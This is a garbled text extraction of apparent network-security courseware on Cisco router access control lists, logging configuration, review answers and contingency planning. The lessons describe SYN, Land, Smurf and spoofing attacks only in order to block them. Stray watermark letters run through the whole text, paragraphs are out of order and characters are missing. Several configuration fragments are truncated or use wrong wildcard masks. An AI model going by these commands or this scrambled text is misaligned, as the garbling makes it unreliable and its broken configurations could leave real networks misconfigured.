ACLs can be used for much more than simply granting or denying access to a service or utility. They can be used to guard against known attacks on the network, such as SYN and DoS attacks. This is due to the fact that many tools use known and identiable patterns in their attacks.
AT
E
367
iti
on
Router#configure terminal Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 20 Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 21 Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 20 Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.255 0.0.0.0 255.255.255.255 eq 21 Router(config)#access-list 145 permit ip any any Router(config)#interface Serial 0 Router(config-if)#ip access-group 145 out Router(config-if)#^Z Router#
Anti-Land ACLs
or
DO NO
ru ct
In
st
When you create these lists, you want them to be complete. In other words, do not forget to block the broadcast addresses (to prevent attacks like the Smurf attack), the network addresses themselves, and private or reserved addresses. In the following conguration fragment, the internal network is 152.148.10.0/24, and you will see that there are quite a few lines necessary to provide for full spoof protection:
DU
Spoong of packets has become more commonplace due to the increased number of tools that provide this function. You can use your router to combat this issue by not allowing packets to enter the network if they are coming from an internal IP address.
PL
Anti-spoofing ACLs
IC
Router#configure terminal Router(config)#interface Serial 0 Router(config-if)#ip address 10.20.30.50 255.255.255.0 Router(config-if)#exit Router(config)# Router(config)#access-list 110 deny ip host 10.20.30.50 host 10.20.30.50 log Router(config)#access-list 110 permit ip any any Router(config)#interface Serial 0 Router(config-if)#ip access-group 110 in Router(config-if)#^Z Router#
Ed
The following conguration fragment shows the defense against a Land attack on host 10.20.30.50, which is an IP address of an external interface on the router.
AT
iti
Another type of attack that has been around for some time is the Land attack. The Land attack is rather simple in design, but it can cause serious network damage to unprotected systems. The attack works by sending a packet from an IP address to the same IP address, and using the same ports. So, a packet would be sent from 10.10.10.10:5700 to 10.10.10.10:5700 causing a signicant slowdown or DoS of the target.
on
Router#configure terminal Router(config)#access-list 170 permit tcp any 192.168.20.0 0.0.0.255 established Router(config)#access-list 170 deny ip any any Router(config)#interface Serial 0 Router(config-if)#ip access-group 170 in Router(config-if)#^Z Router#
Creating Access Control Lists

1.
Setup: Use the network as diagrammed in Figure 5-16 for this task.
Ed
T DU PL IC
TASK 5E-1
st
Although it does not get the credit or generate a high level of interest, logging on the router is a critical aspect of router hardening. Logs enable you to investigate attacks, nd problems in the network, and analyze the network. When you are conguring the logging options on a router, just as logging elsewhere in the network, you must walk a ne line between gathering too much and too little information. Log too much, and you will have a difficult time nding that single piece of critical information you need to make a decision or to perform an action. Log too little, and you do not have enough information to make an informed decision or to take proper action.
In
DO
Logging Concepts
NO
Topic 5F
ru ct
Router#configure terminal Router(config)#access-list 135 permit tcp any 192.168.20.0 0.0.0.255 established Router(config)#access-list 135 permit tcp any 192.168.10.0 0.0.0.255 established Router(config)#access-list 135 deny ip any any Router(config)#interface Serial 0 Router(config-if)#ip access-group 135 in Router(config-if)#^Z Router#
or
AT
Create the conguration fragment that you would use to create an Access Control List to prevent a SYN attack coming from the Internet into the private networks.
E
369
iti
Router#configure terminal Router(config)#access-list 130 deny ip 152.148.10.0 0.0.0.255 any Router(config)#access-list 130 deny ip 127.0.0.0 0.255.255.255 any Router(config)#access-list 130 deny ip 0.0.0.0 255.255.255.255 any Router(config)#access-list 130 deny ip 10.0.0.0 0.255.255.255 any Router(config)#access-list 130 deny ip 172.16.0.0 0.0.240.255 any Router(config)#access-list 130 deny ip 192.168.0.0 0.0.255.255 any Router(config)#access-list 130 deny ip host 255.255.255.255 any Router(config)#access-list 130 permit ip any 152.148.10.0 0.0.0.255 Router(config)#interface Serial 0 Router(config-if)#ip access-group 130 in Router(config-if)#^Z Router#
on
There are many different kinds of logging applications and software products that can track and record logs from all over the network. These applications can then send messages to a pager or cell phone when signicant events happen. In this section, you will look at just the options that the actual router can manage, without using any major third-party applications.
On a Cisco router, the device can log information using several different methods, such as: Console LoggingLog messages are sent to the console port directly. Terminal LoggingLog messages are sent to the VTY sessions. Buffered LoggingLog messages are kept in the RAM on the router. Once the buffer lls, the oldest messages are overwritten by newer messages. Syslog LoggingLog messages can be sent to an external syslog server to store and sort the messages there.
Log Priority
or
Title Example
The following table lists the level of logs, along with their titles and descriptions.
ru ct
0 1 2 3 4 5 6 7 Emergencies Alerts Critical Errors Warnings Notications Informational Debugging
Level
Description
st
The following table lists an example event for each level of severity. Level
0 1 2 3 4 5
In
The IOS was unable to initialize. The core router temperature is too high. A problem in assigning memory occurred. The memory size allocated is invalid. Cryptography operation is unable to complete. An interface changed state to up or down. (This is a very common event.)
370
DO
NO
System is (or is becoming) unusable. Immediate action is needed. A critical condition has occurred. An error condition has occurred. A warning condition has occurred. Normal, but noteworthy event. Informative message. Debugging message.
DU
PL
IC
When you select a level, that level and all others of a lower number will be displayed. For example, if you select level 3, you will be presented with messages from level 3 to 0. If you select level 7, you will be presented with messages from level 7 to 0.
AT
The router has a built-in function of priority listing for log messages. The levels range from 0 to 7. If a message is given a lower number, it is considered to be a more critical message. So, Level 1 is more critical than Level 6.
Ed
SNMP LoggingLog messages are sent (by using SNMP traps) to an SNMP server on the network.
iti
on
Cisco Logging Options
Level
6 7
Example
A packet has been denied by an Access Control List. No event triggers this level; debug messages are displayed only when the debug option is used.
An example of what a log line will look like in the router is:
%SYS-5-CONFIG_I: Configured from console by vty1 (172.16.10.1)
In this line, the %SYS-5-CONFIG_I indicates that a Level 5 message was logged. Following the colon is the message itself. In this case, the router had a conguration change made via a VTY session using IP address 172.16.10.1.
Configuring Logging
The localtime option will make the router stamp the logs using the local time, so that it is easier for people to read and analyze the logs. When using a syslog server, this option is often left off. The show-timezone option adds the timezone to the log message. This can be useful when working with log les from many locations and regions.
Console Logging
st
In this example, level 5 logging has been congured, This means that items in the access list level will not be logged, nor will any debug messages. Had the goal been to see only those log messages that are level 2 or more critical, the proper command would have been logging console critical.
In
Router#configure terminal Router(config)#logging on Router(config)#logging console notification Router(config)#^Z Router#
DO
Console logging is perhaps the most straightforward of all of the logging options in the Cisco router. The following conguration fragment shows logging set to level 5 and to use the console as the method.
NO
DU
ru ct
PL
In order for you to properly analyze the logs, you will need to know what happened when, not just that something happened. The assignment of a time that an event occurred, or to timestamp, is an option in the router. The Cisco command to congure the timestamp option is service timestamp log datetime. There are three options that can be added to this message. The msec option will include the millisecond in a log entry. This may or may not be required, based on your goals. If not added, the log will round the event to the nearest full second.
or
IC
AT
Timestamping
Ed
In the following examples, you will see how to congure different forms of logging. Some will use the buffer, others the console. Viewing the conguration fragments through this section will enable you to determine which type of logging you will use in given situations. On the Cisco router, the command to enable logging is entered in Global Conguration Mode, using the logging on command.
iti
When you are conguring logging in IOS 11.3 and earlier versions, the command must include the name of the level, such as Alerts. In IOS 12.0 and newer versions, you can use either the name of the level or the number of the level.
on
Buffered Logging
Buffered logging requires you to dene the memory size that will be used for the logs. The general formula that many follow is that if the router has less than 16 MB of RAM, your log can be 16 kilobytes. If your router has more than 16 MB of RAM, then your log can go as high as 32 or even 64 KB. On all logs, the time and date can be added to the messages, which is a recommended procedure. On buffered logging, however, it goes from a recommended to a required procedure. This is due to the fact that the router discards old messages and replaces them with new messages, when the buffer space is lled. So, the time of the log is a critical component to buffered logging. The following conguration fragment shows logging set to level 2, and using a timestamp.
Router#configure terminal Router(config)#logging on Router(config)#logging buffered 16000 critical Router(config)#service timestamp log date msec localtime show-timezone Router(config)#^Z Router#
In this example, the amount of memory that has been allocated is 16 KB. The logs will go to the buffer and will be recorded if they are level 2 (Critical) or higher. Finally, full timestamping is used, including the local time and the time zone options.
Ed
T DU
Terminal Logging
or
DO NO
In
372
st
ru ct
Syslog Logging
Router#configure terminal Router(config)#logging on Router(config)#logging monitor 5 Router(config)#^Z Router#terminal monitor Router#
In this example, the terminal session will receive all level 5 and higher messages. This is the rst example that uses the numeric value of the level instead of the name, an indicator that the router must be at least IOS version 12.0. There is a second part for terminal logging. The above fragment will tell the router to log messages to the VTY sessions, but the VTY sessions have not been congured to see the messages. The terminal monitor command enables the VTY session to actually view the messages on screen. In the event that the logs become to numerous or are no longer needed, the terminal no monitor command can be used to stop viewing the logs on the VTY session.
Cisco routers have the ability to send their log messages to a server that is running as a syslog server. This is a highly recommended method of logging in a production environment. Routers collect the log messages, just as they normally do. However, instead of showing them on the console, or storing them in memory, they are sent to a server that will manage the messages and store them to the servers hard drive.
PL
IC
Normally, there are no messages sent to terminal sessions. This is for bandwidth purposes and, in some situations, security purposes. In order to allow logging to be visible on a VTY session, the terminal monitor command must be used. The following conguration fragment shows logging set to level 5, and to be sent to the VTY sessions.
AT
iti
on
This will allow for long-term storage and analysis of the information and will not be subject to real time analysis or memory constraints. Most UNIX and Linux servers have some version of the syslog server function, and there are many syslog applications for Windows systems on the market. To congure syslog logging on a Cisco router, there are four components: The destination host is any host that can be located using a host name, DNS name, or an IP address.
The syslog facility is the name to use to congure the storage of the messages on the syslog server. Although there are quite a few facility names, the routers will use the ones named Local0 through Local7. The severity level of the logs can be viewed as similar to that of the other log messages, using the Cisco severity levels. The source interface for the messages is the actual network interface that will send the messages to the Syslog server.
ru ct
TASK 5F-1
1.
Configuring Buffered Logging
st
Create the conguration fragment you would use for buffered logging, using 32 kilobytes of memory. Include all timestamping options and log level 4 events. Assume that the router is running IOS version 12.2.
Router#configure terminal Router(config)#logging on Router(config)#logging buffered 32000 4 Router(config)#service timestamp log date msec localtime show-timezone Router(config)#^Z Router#
In
DO
NO
T
DU
PL
In this example, logging has been enabled. Logging is going to be sent to a syslog server, logging messages that are level 5 or more critical. The IP address of the syslog server is 10.20.30.45. (Additional servers can be used with multiple commands using different IP addresses here, for redundancy.) The facility on the syslog server is Local5, and the source for these messages is Ethernet 0 on the router.
or
IC
AT
Router#configure terminal Router(config)#logging on Router(config)#logging trap 5 Router(config)#logging 10.20.30.45 Router(config)#logging facility Local5 Router(config)#logging source-interface Ethernet 0 Router(config)#^Z Router#
Ed
The following conguration fragment shows the setup of a router to use a syslog server.
E
373
iti
on
ACL Logging
The previous section on logging focused on the system log events, critical errors, and messages. Another important area to investigate is the use of logging in relationship to your Access Control Lists. When implemented, ACL logs are listed as Level 6 events. In order to implement ACL logging, the commands are very simple. All you need to add is the keyword log or log-input to the end of the ACL statements. You do not want to add this line to all your ACL statements, however, or you will ood your logs with so much information that you will be virtually unable to identify anything useful.
or
DO NO
ru ct
Router#configure terminal Router(config)#access-list any log-input Router(config)#access-list Router(config)#access-list any log-input Router(config)#access-list Router(config)#^Z Router#
145 deny ip any any log-input
For the next example, assume that the router has one internal Ethernet interface (where the trusted network is located) and has two external serial interfaces. The following conguration fragment shows the application of the ACLs, rst list 123 then list 145, on their proper interfaces.
Router#configure terminal Router(config)#interface Serial 0 Router(config-if)#ip access-group 123 in Router(config-if)#exit Router(config)#interface Serial 1 Router(config-if)# ip access-group 123 in Router(config-if)#exit Router(config)#interface Serial 0 Router(config-if)# ip access-group 145 out Router(config)#^Z Router#
In
st
DU
123 permit ip any any 145 permit ip 172.16.0.0 0.0.255.255
PL
123 deny ip 172.16.0.0 0.0.255.255
IC
Earlier, you looked at the creation of anti-spoong ACLs. In this section, you will see these ACLs used with the logging function to gather information for analysis. In these examples, assume that the internal network is 172.16.0.0/16. First, the conguration fragment of the list itself:
AT
Anti-spoofing Logging
Ed
Logging may be one reason that you do not count on the default deny all rule of an ACL. If a packet is dropped due to the default deny all statement, that packet will not be logged. If, however, you add the following line as your last statement in the ACL, then packets will be logged: access-list 123 deny ip any any log.
iti
Use of the log keyword will list the type, date, and time in the ACL log, and is a valid option only for standard ACLs on IOS version 12.0 and newer. The log-input keyword adds information on the interface and source MAC address, and an example of the use of this is if the same ACL is to be applied to more than one interface.
on
VTY Logging
When gaining access to the router, a primary method used was through VTY sessions. These sessions may come under frequent attack at larger organizations. You will want to know who is and who is not successful at gaining access via VTY sessionsagain, logging is the answer to that need. In this example, you will again assume the internal network 172.16.0.0/16, and that there is only one trusted host that has authorized VTY access, 172.16.23.45. With those variables dened, the following is the conguration fragment that will log VTY sessions on the router.
Router#configure terminal Router(config)#access-list 155 permit host 172.16.23.45 any log-input Router(config)#access-list 155 deny ip any any log-input Router(config)#^Z Router#
Router#configure terminal Router(config)#line vty 0 4 Router(config)#access-class 155 in Router(config)#^Z Router#
Ed
T DU PL IC
Once you have created the list, as shown, you will need to apply the list. In the following conguration fragment, the list is applied to VTY sessions 0 through 4.
st
In
DO
ru ct
NO
or
AT
E
375
iti
on
TASK 5F-2
Configuring Anti-spoofing Logging
1.
or
DO NO
ru ct
Summary
In
st
In this lesson, you examined the fundamentals of router security and the principles of routing. You created the congurations that are required to harden a Cisco router and congured the removal of services and protocols. You examined the process of the wildcard mask and how it relates to the Cisco ACL. You created the congurations for ACLs to defend the network against attacks. Finally, you examined the process of logging on a Cisco router and congured buffered and anti-spoong logging.
DU
PL
IC
Router#configure terminal Router(config)#access-list 160 deny ip 192.168.45.0 0.255.255.255 any log-input Router(config)#access-list 160 permit ip any any Router(config)#access-list 170 permit ip 192.168.45.0 0.255.255.255 any log-input Router(config)#access-list 170 deny ip any any log-input Router(config)#^Z Router# Router#configure terminal Router(config)#interface Serial 0 Router(config-if)#ip access-group 160 in Router(config-if)#exit Router(config)#interface Serial 1 Router(config-if)# ip access-group 160 in Router(config-if)#exit Router(config)#interface Serial 0 Router(config-if)# ip access-group 170 out Router(config)#^Z Router#
Ed
AT
iti
on
Create a logged ACL that is used for anti-spoong, using the following information: The router has interfaces Ethernet0, Serial0, and Serial1. Ethernet0 is connected to the only trusted network, which has the IP address 192.168.45.0/24. For this exercise, and in the interest of time, only create anti-spoong for the dened network. If you want to expand this to include all private and reserved networks, you can do so, but it is not required.
Lesson Review
5A What is authentication?
What is authorization?
Authorization is the process of dening what a user can do, or is authorized to do. What is AAA? Authentication, Authorization, and Accounting. What are the methods of access to a Cisco router? Console port Auxiliary port VTY sessions HTTP TFTP SNMP
Ed or
DO NO T DU PL IC
Responses might include: Precise control over the routes that data will take across the network. Easy to congure in small networks. Reduced bandwidth use, due to no excessive router traffc.
Reduced load on the routers, due to no need to make complex routing calculations.
What is a security advantage to using RIPv2 over RIPv1?
Using RIPv2 provides the security advantage of authentication, enabling the routers to identify who is and who is not able to update routing information.
5C What is a security reason for disabling CDP?
What is an attack that you can defend against by disabling ICMP directed broadcasts?
5D What type of Access Control List allows for the checking of port numbers?
Extended ACLs allow for port checking.
In
Smurf.
st
CDP might be broadcasting information about the router that is not intended to be public knowledge.
ru ct
AT
5B List some of the advantages of using static routing.
E
377
iti
on
Authentication is the process of identifying a user, generally granting or denying access.
When a packet enters the router, what is the rst thing the router will check regarding that packet? Is there a route for this packet? If yes, send to the ACLs if there are any; if no, discard the packet (and respond to the sender if need be).
Router(config)#access-list access-list-number {permit|deny} source [source-mask]
What is the syntax for an extended Access Control List?
What is the syntax for implementation of a standard Access Control List?

Router(config-if)#ip access-group access-list-number {in|out}
5F When a conguration change is made to the router, such as an interface being brought down, what level of message will this generate?
ru ct st
In
DO
NO
DU
PL
IC
access-class [access list number] in
or
AT
What is the command for an access list to be implemented on the VTY sessions?
Level 5.
Ed
iti
Router(config)#access-list access-list-number {permit|deny}protocol source source-mask destination destination-mask [operator|operand]
on
5E What is the syntax for a standard Access Control List?
Contingency Planning
Overview
In this lesson, you will take a look at various types of disasters that can befall an organization and put it out of businessunless the organization has implemented some form of business continuity planning. You will look at how such plans can be developed and tested. You will review some technologies that can help keep you powered on, backup strategies for operating systems, and products that can be used in various situations.
LESSON
Objectives
In this lesson, you will: 6A
6C
st
In
In this topic, you will look at backup strategies for operating systems, such as RAID, and other archival options, such as tapes or other hard drives. You will perform hands-on operations detailing the differences between normal, differential, and incremental backups. You will also perform a backup of a Cisco routers conguration.
DO
6D
Examine data-backup strategies for various operating systems and perform tasks related to backups.
NO
In this topic, you will analyze the effects of losing electrical power on your network, and look at various devices that you can use to defend against such disturbances, such as UPS devices and generators.
Study the effect of electrical power loss for networks and the backup planning required to prevent such events.
DU
In this topic, you will analyze the goals of a contingency plan, and look at the various aspects of testing a contingency plan.
ru ct
PL
Lesson 6: Contingency Planning
6B
Analyze contingency planning goals, and review the testing of such plans.
IC
In this topic, you will see why you have to plan for backups, look at the various types of disasters that can occur, and briey look at security policies and their affect on business.
or
AT
Identify disaster types, examine issues related to contingency planning, and consider the role of security policies as part of an overall contingency planning strategy.
Ed
E
379
iti
on
Data Files none
Lesson Time 4 hours
Topic 6A
Continuity and Recovery
For this lesson, we will look at continuity and recovery for the following areas: Computers Networks The premises that house them
Planning for Backups
or
DO NO
ru ct
Disasters
Floods. Earthquakes. Tornadoes.
Examples of Disasters
In
st
Disasters that can affect businesses can be classied into various categories depending on who you talk to, however, we can start by classifying them broadly into natural and man-made categories. Here are some examples of each: Natural disasters include:
Getting hit by a meteorite.
Man-made disasters include:
380
Acceptable Use Policies will be dealt with in greater detail in the Network Defense and Countermeasures course.
Depending on the problems that need solving, solutions can vary. Beginning with creating an Appropriate Resource Usage document or Acceptable Use Policy for the users, to controlling user behavior within the bounds of acceptance, to dening what resources need protection and what resources need to be backed up, to dening what resources need to have a redundant but live copythe individuals or the team members leading the study have their work cut out for them.
DU
PL
This study can be undertaken by one person or by a team of people representing a cross-section of the people employed by the organization, depending on the size of that organization. As with anything that has a nancial connotation, the organizations upper management has to be involved and made aware of the implications of implementing the various technologies involved, but upper management does not necessarily need to have all of the little details.
IC
AT
Before a continuity and recovery system is put into place for an organization, a study needs to be undertaken in order to classify the nature of the business and its requirement for putting a recovery system in place.
Ed
iti
on
Contingency planning forms a signicant part of modern business. If a business is to survive a disaster and move forward, it has no choice but to plan for and allocate sufficient resources to cater to the recovery process. When continuity and recovery planning are discussed in boardrooms, computers and networks are just one of the many issues talked aboutalthough most businesses have, in the last decade, begun to rely heavily on technology to get the job done. Computers and networks are therefore justiably critical components in any modern business.
Intentional disasters, such as terrorist attacks, worker lockouts/strikes, and so forth. Unintentional disasters, such as design error, operator error, mismanagement, and so forth.
Environmental Disasters
or
DO NO
ru ct In st
T
DU
PL
IC
Certain natural disasters are known to be fairly regular in certain locations. For example, in some low-lying areas of Florida, the threat of ooding is fairly high during the hurricane season. Tornadoes are common in Kansas, forest res break out now and then in the southwest regions of the U.S., and the threat of an earthquake always looms over one well-known city in California.
AT
E
381
Analyzing which natural disasters to take into account, and which not to, is fairly straightforward. First, list all known natural disasters, then highlight those that are likely in your location. Those that are not highlighted are extremely unlikely or improbable for that location.
Ed
As an example, and on a more serious note, just a few days after the 9-11 terrorist attacks, American Express sent an email to all its valued customers, reassuring everyone that even though their offices in Manhattan were affected, their business was not, due to the excellent backup and recovery systems maintained elsewhere.
iti
Not much can be done to prevent natural disasters. You should, however, have a recovery plan. For a recovery plan to be effective, it should be housed in structurally and environmentally sound buildings or it should be housed far away, perhaps in another geographic location, if your business is to survive such calamities.
on
You may have noticed that we didnt mentioned re in the enumeration of disasters. Fires can be a result of either a natural or man-made cause. When res are man-made, they could be intentional or unintentional.
Technological or Man-made Disasters

In analyzing which man-made disasters to take into account, and which not to, all bets are off. Lets revisit the list we created earlier. Broadly speaking, man-made disasters are divided into intentional and unintentional subcategories. Terrorist attacks are intentional. They can be vicious, physical attacks, or they can be more subtle, such as cyber-terrorism.
virus: A program that can infect other programs by modifying them to include a possibly evolved copy of itself.
Worker lockouts or worker strikes are generally known to the management beforehand, so some planning can be done. Computer viruses, worms, and Trojan horses all fall under the man-made and intentional categories. Programmers who write and spread such code do so with the knowledge that their creations are going to cause harm. These are disasters waiting to happen. Sometimes these programs are released under the guise of remote management tools, but they can be used maliciously, nevertheless. Attacks fashioned against email and Web servers aim to paralyze a company by targeting its digital nervous system. Today, rewalls, intrusion detection systems, and response systems are part of a huge industry, thanks to the previously-mentioned breed of programmers. Unintentional man-made disasters are very difficult to gauge or predict. If a disaster is due to a design error, you generally have to go back to the drawing board. If its due to operator error or mismanagement, you have to reform your usage policies. Sometimes, just the day-to-day wear and tear on computer systems will bring them down. The classic component in computer systems that suffer such wear and tear are the hard drives, simply because they are comprised of moving partsspinning disks and read/write heads that swing back and forth along the disk surfaces. Modern hard drives are surprisingly durable, but they still have a useful life of around ve years. Since data and programs reside mainly on hard drives, you have to plan on backing them up periodically.
or
DO NO
ru ct

In
382
st
Loss of electrical power, even momentarily, can be disastrous, so all sensitive systems should be able to instantaneously switch over to a backup power system. A better method would be to run the systems off of the backup system while continually recharging it. This should not surprise anyonetake a look at how your notebook works. In fact, some companies that have realized this are beginning to furnish every users desk with a docking station and a notebook instead of a desktop PC, simply because a momentary power outage would not disrupt anybodys work.
Security Policies and Their Impact on the Business

In Network Defense and Countermeasures, the next course in this series, you will do a lot more work on analyzing risk and formulating security policies for your organization, so we will just touch on it lightly here.
DU
Electrical power uctuationsspikes, surges, sags, brownouts, faults, and blackoutscan also cause havoc; therefore, one of the preventive measures that must be addressed should deal with conditioning and steadying the power supply before it is fed into your computer and network systems.
PL
IC
AT
worm: Independent program that replicates from machine to machine across network connections often clogging networks and information systems as it spreads.
Ed
iti
on
Before writing a security policy, all risks that can be foreseen have to be analyzed. Broadly speaking, there are two kinds of analyses that can be performed: qualitative and quantitative.
Quantitative Risk Analysis
What is the make and model of the car?
How many miles a day would you typically drive to work? Does your car have airbags? Have you been ticketed for speeding before? What kind of coverage do you expect to have?
Do you park your car in an enclosed space or on a street side?
Do you wear seat belts? It may be the law, but they will still ask you. Have you, as a driver, been involved in any accidents before?
Ed
DU PL IC T
What is your age, as well as the age of anyone else who would be driving the car?
To create a quantitative risk analysis for your computers and networks, you would do something similar. For example, you might use the following sequence: 1. Create an inventory of all assets within your network. 2. 3. 4. 5. 6.
ru ct
Basically, the insurance company proles you according to the answers that you provide to these questions. Between the prole they create of you and the kind of coverage you expect to have, they will give you a quote for your monthly, quarterly, half-yearly, or annual premium. They have thus performed a quantitative risk analysis on you and your car.
or
DO NO
AT
Quantitative Risk Analysis
Identify all of your users, including information about the type of users, their day-to-day demands on the network, and so forth. Analyze what kind of security systems you have, such as authentication mechanisms and access control. Determine what kind of backup systems are already in place. Identify what risks are covered and what are not. Determine if the uncovered risks are acceptable to your company.
In
Based on analyses like these, you would be able to recognize the need for backup systems, what your company would do in the event that disaster struck, and how the recovery methodologies would be put to work.
st
E
383
iti
Insurance companies use quantitative analysis frequently. Think for a few minutes on the initial conversation you had with your motor vehicle insurance provider. What kinds of questions were you asked? Typically, you would have been asked to answer the following kinds of questions:
on
Its the quantitative risk analysis that will interest the upper management of a company (those who allocate budgets, for instance), because with this method, a dollar value can be assigned to the potential risk at hand. A quantitative analysis has two basic parts: the probability of a threat occurring and the estimated loss that will result from the threat.
threat: The means through which the ability or intent of a threat agent to adversely affect an automated system, facility, or operation can be manifest. A potential violation of security.
Backup and Recovery Policies

The backup and recovery section of a security policy provides the foundation for the continuity of the entire organization. A generic denition of the policy is that it provides a document, or a set of documents, that describe the backup security controls that are to be implemented in an organization. From a benet standpoint, the policy is able to provide the organization with several key points. These benets can be generalized into the following: They lower the legal liability to employees and third-party users of resources. They prevent waste of resources.
Topic 6B
Developing the Plan
Requirements and Goals of a Contingency Plan
or
Item
ru ct
Number
1 2 3 4 5
DU
Standard
Utility company Hard drives Tape drives T1 from ISP A SDSL from ISP B
PL
Once a risk analysis has been done for a company, and it has been agreed to by the planning team, it will be up to the executive group to implement a contingency plan. All items that require some form of backup plan have to be listed. For example, take a look at the following table. Backup
UPS Tape drives DVD-R SDSL from ISP B Via satellite from ISP C
st
In this table, you can see that there are secondary backup plans for the backup plans themselves. This depends on the criticality of the item in question. If Internet access is a critical issue, then the company has to choose its ISP(s) wisely. Not only should the company hedge its bets with multiple ISPs, it also should make sure that it has a different physical line running out of its building to the ISP. If an ISP is offering DSL services by leasing bandwidth from your local phone company and the local phone company has a fault, then your company may not have Internet access at all for a couple of days until the fault on the phone line is rectied. A wireless solution via satellite, for example, will take a completely different path out of your building and may allow you to hedge your bets.
384
In
DO
NO
Electrical power Computer data Backed-up data Internet access Internet access backup
IC
AT
To develop an effective contingency plan, you need to have some ideas about what the plan should cover, as well as how to test it so that you know that it will work when you need it to. Lets begin by looking at what you want the plan to accomplish.
Ed
iti
They protect proprietary and condential information from theft, unauthorized access or modication, or internal misuse of resources.
on
Listing the goals of contingency planning is a critical step, as this will have a direct bearing on how the plan should be implemented and in what sequence. The previous table looks like somebody read the minutes of the rst brainstorming meeting and attempted to order the list into a chart. It is clearly a rst attempt. After a few more meetings, more issues will be brought forth and may include other items that are imperative for the business if it has to survive a disaster. Not only should the contingency plan list and analyze all possible threats to the business, the backup plans to counter these threats should also be graded in order of importance to the continuity of the business. Responsibility has to be assigned to a person, and a brief description of the job required to carry out that plan has to be noted. The person selected (or the position in the company) has to be provided appropriate authority to carry out the task. Emergency roles have to be dened. The priority of tasks to be carried out has to be listed as per the grades allocated. Finally, a simulation of the crisis has to be carried out.
or
NO DO
Testing the Plan
ru ct
Testing of plans can be done at various levels and intensities. They are broadly divided as follows: Simulated testing on paper (or check list test).
DU
Any backup and restore plan that you come up with must be tested, both in theory and in practice. The theoretical outline must be vetted through by more than one person involved in the system and their comments debated. Once everyone involved in the process is in agreement, the plan has to be clearly stated. All concerned personnel involved in the recovery effort should be given a copy of this plan for study.
PL
Contingency Plan Testing
Limited environment simulation (or structured walk-through test).
Simulated Testing on Paper (the Check List Test)

When all of the personnel involved in the recovery effort have been given sufficient time to study their roles in the recovery process, they should walk through the steps in a sort of dry run of the procedures involved. This is also known as a check list test or a simulated paper test. Different disaster scenarios are recorded on a whiteboard, and the various personnel start lling in the blanks to the recovery plan based on the role(s) allocated to them. This is akin to reading through a script before staging a rehearsal for a play.
In
st
Full-scale environment simulation (or full interruption test).
IC
AT
The team of people designated to handle a crisis can be a different team from the one handling that job on a daily basis. Some diversity is desired, because in an emergency, the people who handle the job on a daily basis may not be around. If immediate action is paramount; for example, if backup tapes have to be used to restore the systems right away, then more than one network administrator must be trained in this process. This is an extremely critical processrestoring the wrong backup data could set the company back by that many days, weeks, or maybe even months.
Ed
Creating the Contingency Plan
E
385
iti
on
Limited Environment Simulation (the Structured Walkthrough Test)

An example for limited environment simulation that many of you might be familiar with is when the electronic surveillance monitoring and security systems are rst installed at your premises. After the alarm system has been installed, a select few people with certain levels of responsibility in the company are informed of the code to enter upon opening the premises. The contact phone numbers for these people are given to the company that installed the security system. Upon installation of the system and initial testing, the system alarm is tripped, and the alarm is automatically sent to the security company. The security company personnel looks up their list of phone numbers for your company and proceeds to call each one, in turn, down the list. If none of the people on that list answer the phone, then the local police are called in to investigate a potential break-in. Another example is the re drill, typically carried out in tall buildings. When reescape drills are rst explained to the general building populace, every aspect of the escape process is walked through. These are also referred to as structured walk-through tests. Similarly, once a backup system is in place, then the recovery system should be put through its paces to make sure it works. When various departments in an organization that normally interact with each other in a certain way now nd that there are other interaction channels, situations may arise. Typical problems that occur have to do with the hierarchical nature of most large organizations. A person at a senior level in one department may feel that he or she does not have to answer to a person in a peer position in another department. These issues should be catalogued, then the backup and recovery plan should be reviewed to take them into account.
Ed
T DU
This is different than having an unannounced drill, where the occupants are caught by surprise, and the sanctity of the drill is maintained by carrying it out at irregular intervals.
availability: Assuring information and communications services will be ready for use when expected.
st
A full-scale simulation can also be undertaken so that all aspects of a recovery process are tested. This kind of a test is performed infrequently and retests spaced far apart, as it is disruptive to the organization. The majority of the people in the company are not told in advance that it is a test. Such a test, also termed as a full interruption test, will actually test the reaction of all the personnel within the organization. Not everybody reacts well under stress, and this test will help in identifying those people who can be trusted to undertake critical jobs in an emergency.
386
In
DO
ru ct
In an full-scale simulation test, a disaster scenario is chosen and the recovery plan for that scenario is actually executed, step by step, to see if it works. Restrictions to the availability of resources are mimicked as with an actual disaster. The simulation may be designed so that any backup or recovery mechanisms that are available at a hot, warm, or cold site (youll see more about these later) that needs to be accessed to expedite recovery can be accessed. Unexpected or unpredictable events can occur during a simulation test. As with the structured walk-through tests, such events should be recorded, then the backup and recovery plan should be reviewed to take them into account. Once the reason for the unexpected event is understood, then the backup and recovery plan should be modied to take this into account. In an actual simulation test, the organizations day-to-day workings are not disturbed, because only those personnel involved in the recovery operations are affected.
NO
PL
IC
Full-scale Environment Simulation (the Full Interruption Test)
or
AT
iti
on
Topic 6C
The Technologies of Staying On
Ed or ru ct
Figure 6-1: Disturbances in electrical supply and their remedies.
Personal UPS Devices
If you visit www.tigerdirect.com and look for power protection devices, you will see the following subcategories: surge suppressors, UPS Battery Backup (Personal), UPS Battery Backup (Business), UPS Battery Backup (Network). This is pretty much how UPS devices are cataloged. Even if you are not going to buy a UPS system, you should at least have a surge suppressor. Having said that, most personal-use UPS devices are quite affordable and are a must for small businesses. They are rated from around 150 to 300 watts, and provide enough time (about 15 minutes) for you to at least save your work, nish small print jobs, and shut down the computer properly.
st
In
DO
NO
DU
PL
IC
AT
E
387
iti
Disturbances in Electrical Supply and Their Remedies
Spike busters and surge suppressors help protect against only spikes and surges; voltage stabilizers help protect against spikes, surges, and sags. Not only do backup batteries take care of those scenarios, they also help protect against faults and brownouts, as well as short-term blackouts. Generator sets help protect against prolonged blackouts. Figure 6-1 will help explain these relationships better.
on
Most of us rely on our local power utility companies as our primary power source. Depending on the criticality of the business, we may choose to supplement this with some form of battery backup or even generate our own power, with appropriate technologies to assist in the switchover.
Smarter UPS systems will have a separate communication channel with your PC via the serial port or a USB port. In case you are not around when the power fails, the UPS will initiate a clean shutdown of the system. On a Windows machine, you can use the Power Options Control Panel to manage your UPS devices. This interface was developed by APC for Microsoft. On a Linux machine, you can use APCUPSD (APCs UPS Daemon), which is available at www.apcupsd.com/index2.html.
TASK 6C-1
Configuring a UPS
